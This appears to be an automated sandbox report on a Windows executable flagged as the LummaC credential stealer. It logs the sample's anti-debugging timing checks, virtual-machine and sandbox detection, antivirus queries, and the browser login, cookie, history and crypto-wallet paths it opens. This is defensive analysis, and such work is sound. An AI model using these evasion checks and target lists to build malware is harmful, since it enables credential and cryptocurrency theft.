Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0E57 second address: 4AA0E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0E5B second address: 4AA0EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F29FCD4346Ch 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F29FCD43471h 0x00000015 jmp 00007F29FCD43470h 0x0000001a popad 0x0000001b xchg eax, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dl, FDh 0x00000021 pushfd 0x00000022 jmp 00007F29FCD43476h 0x00000027 sub eax, 00EBF998h 0x0000002d jmp 00007F29FCD4346Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0EC4 second address: 4AA0ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E2BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0ECD second address: 4AA0EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp-04h], 55534552h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edx 0x00000013 jmp 00007F29FCD43474h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0EF5 second address: 4AA0EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0AAC second address: 4AB0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FCD43474h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0AC4 second address: 4AB0B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007F29FC518344h 0x00000013 jmp 00007F29FC518342h 0x00000018 popad 0x00000019 cmp dword ptr [75AB459Ch], 05h 0x00000020 pushad 0x00000021 push esi 0x00000022 mov ecx, edi 0x00000024 pop edi 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 je 00007F2A6D4B6226h 0x0000002f pushad 0x00000030 mov si, 2A69h 0x00000034 popad 0x00000035 pop ebp 0x00000036 pushad 0x00000037 mov ah, BDh 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C7B second address: 4AB0C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C7F second address: 4AB0C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0C85 second address: 4AB0CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2A6DCD7158h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29FCD4346Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0CA7 second address: 4AB0CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0CAB second address: 4AB0CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0CB1 second address: 4AB0D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC51833Ch 0x00000008 pushfd 0x00000009 jmp 00007F29FC518342h 0x0000000e or ch, FFFFFFF8h 0x00000011 jmp 00007F29FC51833Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [ebp+08h], 00002000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F29FC518345h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC09A7 second address: 4AC09FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FCD4346Fh 0x00000008 pushfd 0x00000009 jmp 00007F29FCD43478h 0x0000000e and al, FFFFFFE8h 0x00000011 jmp 00007F29FCD4346Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F29FCD43475h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC09FD second address: 4AC0A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0A03 second address: 4AC0A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0A07 second address: 4AC0A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, 22h 0x0000000e mov dl, ah 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0A18 second address: 4AC0AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F29FCD43470h 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F29FCD43470h 0x00000019 test esi, esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F29FCD4346Eh 0x00000022 and ax, A268h 0x00000027 jmp 00007F29FCD4346Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F29FCD43478h 0x00000033 adc si, 74C8h 0x00000038 jmp 00007F29FCD4346Bh 0x0000003d popfd 0x0000003e popad 0x0000003f je 00007F2A6DCD0D79h 0x00000045 jmp 00007F29FCD43476h 0x0000004a cmp dword ptr [75AB459Ch], 05h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F29FCD43477h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0AE0 second address: 4AC0B09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2A6D4BDCD0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B09 second address: 4AC0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B0D second address: 4AC0B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B13 second address: 4AC0B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43472h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B2F second address: 4AC0B40 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 33CFF6CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B40 second address: 4AC0B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0B5D second address: 4AC0BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F29FC518343h 0x0000000c xor ecx, 177695EEh 0x00000012 jmp 00007F29FC518349h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0BA1 second address: 4AC0BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0BA5 second address: 4AC0BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0BFE second address: 4AC0C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0C03 second address: 4AC0C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F29FC51833Dh 0x0000000a sub ah, FFFFFF96h 0x0000000d jmp 00007F29FC518341h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, esi 0x00000017 jmp 00007F29FC51833Eh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F29FC51833Eh 0x00000024 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AECB44 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AECA63 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D26636 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AF0545 rdtsc

0_2_00AF0545

Source: C:\Users\user\Desktop\file.exe TID: 5948

Thread sleep time: -270000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: file.exe, 00000000.00000002.1494042557.0000000000788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, 00000000.00000002.1494042557.0000000000788000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494042557.0000000000757000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: file.exe, 00000000.00000003.1335820959.000000000544A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: file.exe, 00000000.00000003.1335820959.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AF0545 rdtsc

0_2_00AF0545

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00ACD930 LdrInitializeThunk,

0_2_00ACD930

Source: file.exe, file.exe, 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: kProgram Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.1415129893.0000000005431000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496783158.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415035715.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493528719.0000000005432000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 5380, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1494042557.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000003.1310755085.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000002.1494390752.00000000007F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000002.1494042557.0000000000788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
